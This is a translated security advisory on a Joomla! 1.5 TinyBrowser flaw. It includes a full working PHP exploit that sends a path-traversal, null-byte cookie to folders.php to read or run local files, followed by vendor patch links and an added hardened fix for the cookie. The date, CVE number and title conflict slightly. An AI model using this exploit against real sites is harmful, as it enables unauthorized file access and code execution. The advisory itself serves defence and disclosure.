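Joomla! TinyMCE Editor TinyBrowser Plugin File Upload Arbitrary PHP Code Execution Vulnerability

Published: 2009-07-22
Updated: 2009-07-22

Affected systems:
Joomla! Joomla! 1.x
Description:
CVE(CAN) ID: CVE-2011-4906

Joomla! is an open-source content management system (CMS).

Joomla!'s implementation contains multiple security vulnerabilities; successful exploitation can lead to disclosure of certain system information. The vulnerabilities arise because the TinyMCE editor allows unauthenticated file uploads; because some files lack the JEXEC check; and because the "tinybrowser_lang" cookie parameter in plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/config_tinybrowser.php is used in plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php without being properly filtered.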

<*Source: Patrice Lazareff
        Juan Galiana Lara
  
  Link: http://secunia.com/advisories/35899
*>

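Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!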

<?php
    /*
        Copyright (c) ITIX LTD

        This program is free software: you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation, either version 3 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program.  If not, see <http://www.gnu.org/licenses/>.

        TITLE:      Joomla 1.5.12 read/exec remote files
        AUTHOR:     Nikola Petrov (vp.nikola@gmail.com)
        VERSION:    1.0
        LICENSE:    GNU General Public License

        Platform: Joomla 1.5.12
        Vulnerabilities discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)
        Date: 27.08.2009
    */
    
    print "\n\n#########################################################################\n";
    print "# LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)\n";
    print "# Date: 27.08.2009\n";
    print "#########################################################################\n\n";

    if($argc < 4) {
        print "usage: php ". $argv[0] ." host path file [port] [debug]\n";
        print "example: php ". $argv[0] ." localhost /j1512 ../../../../../../../../wamp/www/j1512/images/stories/duck.jpg 80 1\n";
        exit();
    }
    
    $Host = $argv[1];
    $Path = $argv[2] . '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php';
    $File = $argv[3] . '%00';
    
    empty($argv[4]) ? $Port = 80 : $Port = $argv[4];
    empty($argv[5]) ? $Debug = 0 : $Debug = 1;

    function HttpSend($aHost, $aPort, $aPacket) {
        $Response = "";

        if(!$Socket = fsockopen($aHost, $aPort)) {
            print "Error connecting to $aHost:$aPort\n\n";
            exit();
        }
        
        fputs($Socket, $aPacket);
        
        while(!feof($Socket)) $Response .= fread($Socket, 1024);
        
        fclose($Socket);
        
        return $Response;
    }
    
    $Packet  = "GET {$Path} HTTP/1.0\r\n";
    $Packet .= "Host: {$Host}\r\n";
    $Packet .= "Cookie: tinybrowser_lang={$File}\r\n";
    $Packet .= "Connection: close\r\n\r\n";
    
    if($Debug) {
        print "Request to '$Host:$Port':\n";
        print $Packet;
    }
    
    print HttpSend($Host, $Port, $Packet);
?>

Recommendation:
Vendor patch:

Joomla!
-------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:

http://developer.joomla.org/security/
Joomla:
http://developer.joomla.org/security/news/301-20090722-core-file-upload.html
http://developer.joomla.org/security/news/302-20090722-core-missing-jexec-check.html
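
A hardened form of the language-cookie handling described above, as an added example that is not taken from Joomla! or TinyBrowser. The function name resolve_lang_file, the one-file-per-language directory layout and the 'en' default are assumptions made for illustration.

```php
<?php
// Added example, not Joomla!/TinyBrowser code. Function name, directory
// layout and default language are assumptions made for illustration.

/**
 * Map an untrusted language cookie to a language file that really exists.
 * The cookie value never becomes part of a filesystem path: it is only
 * compared against names discovered on disk.
 */
function resolve_lang_file($rawCookie, $langDir, $default = 'en')
{
    // Build the allow-list from the files shipped in the language directory.
    $allowed = array();
    foreach (glob($langDir . '/*.php') ?: array() as $file) {
        $allowed[basename($file, '.php')] = $file;
    }
    if (!isset($allowed[$default])) {
        throw new RuntimeException('default language file is missing');
    }

    // Reject anything that is not a plain language code: this drops
    // "../" sequences, path separators, NUL bytes and literal "%00".
    if (!is_string($rawCookie)
        || !preg_match('/\A[a-z]{2}(?:_[a-z]{2})?\z/', $rawCookie)
        || !isset($allowed[$rawCookie])) {
        return $allowed[$default];
    }
    return $allowed[$rawCookie];
}

// Constructed demo: a temporary language directory with two files.
$dir = sys_get_temp_dir() . '/tb_langs_' . getmypid();
@mkdir($dir);
file_put_contents("$dir/en.php", "<?php // constructed English strings\n");
file_put_contents("$dir/de.php", "<?php // constructed German strings\n");

// Constructed cookie values: valid, unknown, traversal + NUL, encoded, array.
$samples = array('de', 'xx', "../../../images/stories/duck.jpg\0",
                 '..%2f..%2fimages%2fduck.jpg%00', array('en'));
foreach ($samples as $value) {
    $shown = is_string($value) ? addcslashes($value, "\0..\37") : gettype($value);
    echo str_pad($shown, 40), ' -> ', basename(resolve_lang_file($value, $dir)), "\n";
}

array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```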

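This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.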